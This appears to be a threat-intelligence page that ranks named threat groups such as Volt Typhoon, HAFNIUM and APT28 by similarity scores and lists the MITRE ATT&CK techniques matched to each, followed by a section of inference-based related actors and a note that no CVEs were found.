Sidewinder

Score: 3.16
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
Link to MITRE →

Confucius

Score: 3.16
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
Link to MITRE →

BlackTech

Score: 7.16
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1526 - Cloud Service Discovery
Link to MITRE →

Windshift

Score: 7.90
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.011 - Lua
  • T1059.012 - Hypervisor CLI
Link to MITRE →

Cinnamon Tempest

Score: 10.31
Matched TTPs:
  • T1591.003 - Identify Business Tempo
  • T1176.001 - Browser Extensions
  • T1059.010 - AutoHotKey & AutoIT
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
Link to MITRE →

Medusa Group

Score: 13.89
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1218.003 - CMSTP
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1537 - Transfer Data to Cloud Account
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Aquatic Panda

Score: 7.77
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1003.007 - Proc Filesystem
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
Link to MITRE →

Blue Mockingbird

Score: 5.18
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

BlackByte

Score: 7.87
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Carbanak

Score: 5.18
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
Link to MITRE →

APT3

Score: 7.77
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1059.011 - Lua
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

Winter Vivern

Score: 6.39
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.012 - Hypervisor CLI
Link to MITRE →

APT1

Score: 6.71
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
Link to MITRE →

HAFNIUM

Score: 10.13
Matched TTPs:
  • T1027.008 - Stripped Payloads
  • T1049 - System Network Connections Discovery
  • T1105 - Ingress Tool Transfer
Link to MITRE →

APT5

Score: 3.84
Matched TTPs:
  • T1027.008 - Stripped Payloads
Link to MITRE →

Chimera

Score: 5.77
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1199 - Trusted Relationship
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Volt Typhoon

Score: 13.45
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1049 - System Network Connections Discovery
  • T1199 - Trusted Relationship
  • T1537 - Transfer Data to Cloud Account
  • T1546.016 - Installer Packages
Link to MITRE →

ZIRCONIUM

Score: 8.21
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1547.002 - Authentication Package
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

Mustard Tempest

Score: 3.74
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1059.012 - Hypervisor CLI
Link to MITRE →

LAPSUS$

Score: 3.31
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
Link to MITRE →

Metador

Score: 3.31
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
Link to MITRE →

BackdoorDiplomacy

Score: 5.59
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
Link to MITRE →

Axiom

Score: 6.88
Matched TTPs:
  • T1049 - System Network Connections Discovery
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
Link to MITRE →

INC Ransom

Score: 5.77
Matched TTPs:
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Storm-0501

Score: 4.58
Matched TTPs:
  • T1552.003 - Shell History
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

GALLIUM

Score: 5.19
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1537 - Transfer Data to Cloud Account
Link to MITRE →

Thrip

Score: 3.60
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1556 - Modify Authentication Process
Link to MITRE →

POLONIUM

Score: 3.25
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
Link to MITRE →

Daggerfly

Score: 4.60
Matched TTPs:
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
Link to MITRE →

Equation

Score: 4.13
Matched TTPs:
  • T1130 - Install Root Certificate
Link to MITRE →

Strider

Score: 4.13
Matched TTPs:
  • T1130 - Install Root Certificate
Link to MITRE →

Velvet Ant

Score: 6.53
Matched TTPs:
  • T1027.007 - Dynamic API Resolution
  • T1566.003 - Spearphishing via Service
Link to MITRE →

Threat actors related to this Pulse (inference-based)

Kimsuky

Score: 0.80
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1033 - System Owner/User Discovery
  • T1199 - Trusted Relationship
  • T1526 - Cloud Service Discovery
  • T1059.010 - AutoHotKey & AutoIT
  • T1059.011 - Lua
  • T1598.003 - Spearphishing Link
  • T1537 - Transfer Data to Cloud Account
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1606.002 - SAML Tokens
  • T1205 - Traffic Signaling
  • T1547.002 - Authentication Package
  • T1552.003 - Shell History
  • T1003.007 - Proc Filesystem
  • T1053.007 - Container Orchestration Job
Link to MITRE →

Lazarus Group

Score: 0.76
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1059.012 - Hypervisor CLI
  • T1598.003 - Spearphishing Link
  • T1055.005 - Thread Local Storage
  • T1087.002 - Domain Account
  • T1205 - Traffic Signaling
  • T1132.001 - Standard Encoding
  • T1606.002 - SAML Tokens
  • T1547.002 - Authentication Package
  • T1105 - Ingress Tool Transfer
  • T1546.016 - Installer Packages
  • T1218.010 - Regsvr32
  • T1059.010 - AutoHotKey & AutoIT
  • T1556 - Modify Authentication Process
Link to MITRE →

Mustang Panda

Score: 0.75
Matched TTPs:
  • T1169 - Sudo
  • T1199 - Trusted Relationship
  • T1526 - Cloud Service Discovery
  • T1059.011 - Lua
  • T1598.003 - Spearphishing Link
  • T1053.007 - Container Orchestration Job
  • T1055.005 - Thread Local Storage
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1606.002 - SAML Tokens
  • T1105 - Ingress Tool Transfer
  • T1218.010 - Regsvr32
  • T1059.010 - AutoHotKey & AutoIT
  • T1556 - Modify Authentication Process
Link to MITRE →

FIN7

Score: 0.72
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1027.007 - Dynamic API Resolution
  • T1564.002 - Hidden Users
  • T1598.003 - Spearphishing Link
  • T1011.001 - Exfiltration Over Bluetooth
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1606.002 - SAML Tokens
  • T1205 - Traffic Signaling
  • T1547.002 - Authentication Package
  • T1105 - Ingress Tool Transfer
  • T1059.010 - AutoHotKey & AutoIT
Link to MITRE →

Sandworm Team

Score: 0.71
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1049 - System Network Connections Discovery
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1598.003 - Spearphishing Link
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1606.002 - SAML Tokens
  • T1558 - Steal or Forge Kerberos Tickets
  • T1547.002 - Authentication Package
  • T1546.016 - Installer Packages
  • T1218.010 - Regsvr32
  • T1005 - Data from Local System
  • T1059.010 - AutoHotKey & AutoIT
Link to MITRE →

Contagious Interview

Score: 0.66
Matched TTPs:
  • T1059.006 - Python
  • T1033 - System Owner/User Discovery
  • T1199 - Trusted Relationship
  • T1021.006 - Windows Remote Management
  • T1091 - Replication Through Removable Media
  • T1087.002 - Domain Account
  • T1606.002 - SAML Tokens
  • T1558 - Steal or Forge Kerberos Tickets
  • T1556 - Modify Authentication Process
  • T1552.003 - Shell History
  • T1221 - Template Injection
Link to MITRE →

Turla

Score: 0.64
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1113 - Screen Capture
  • T1056.001 - Keylogging
  • T1059.012 - Hypervisor CLI
  • T1606.002 - SAML Tokens
  • T1547.002 - Authentication Package
  • T1546.016 - Installer Packages
  • T1003.007 - Proc Filesystem
  • T1136.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
Link to MITRE →

OilRig

Score: 0.59
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1526 - Cloud Service Discovery
  • T1598.003 - Spearphishing Link
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1606.002 - SAML Tokens
  • T1558 - Steal or Forge Kerberos Tickets
  • T1218.010 - Regsvr32
  • T1005 - Data from Local System
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1556 - Modify Authentication Process
Link to MITRE →

Gamaredon Group

Score: 0.57
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1598.003 - Spearphishing Link
  • T1059.013 - Container CLI/API
  • T1091 - Replication Through Removable Media
  • T1087.002 - Domain Account
  • T1205 - Traffic Signaling
  • T1547.002 - Authentication Package
  • T1546.017 - Udev Rules
  • T1591.003 - Identify Business Tempo
  • T1059.010 - AutoHotKey & AutoIT
Link to MITRE →

Threat Group-3390

Score: 0.57
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1526 - Cloud Service Discovery
  • T1059.012 - Hypervisor CLI
  • T1598.003 - Spearphishing Link
  • T1537 - Transfer Data to Cloud Account
  • T1091 - Replication Through Removable Media
  • T1087.002 - Domain Account
  • T1218.003 - CMSTP
  • T1546.017 - Udev Rules
  • T1218.010 - Regsvr32
  • T1059.010 - AutoHotKey & AutoIT
Link to MITRE →

APT32

Score: 0.56
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1113 - Screen Capture
  • T1027.007 - Dynamic API Resolution
  • T1059.012 - Hypervisor CLI
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1105 - Ingress Tool Transfer
  • T1218.010 - Regsvr32
  • T1556 - Modify Authentication Process
Link to MITRE →

APT28

Score: 0.56
Matched TTPs:
  • T1199 - Trusted Relationship
  • T1059.012 - Hypervisor CLI
  • T1598.003 - Spearphishing Link
  • T1087.002 - Domain Account
  • T1547.002 - Authentication Package
  • T1558 - Steal or Forge Kerberos Tickets
  • T1105 - Ingress Tool Transfer
  • T1499.001 - OS Exhaustion Flood
  • T1218.010 - Regsvr32
  • T1566.003 - Spearphishing via Service
  • T1059.010 - AutoHotKey & AutoIT
Link to MITRE →

Related CVEs

No CVEs were found in this Pulse.

Pulse – Threat Actor Graph

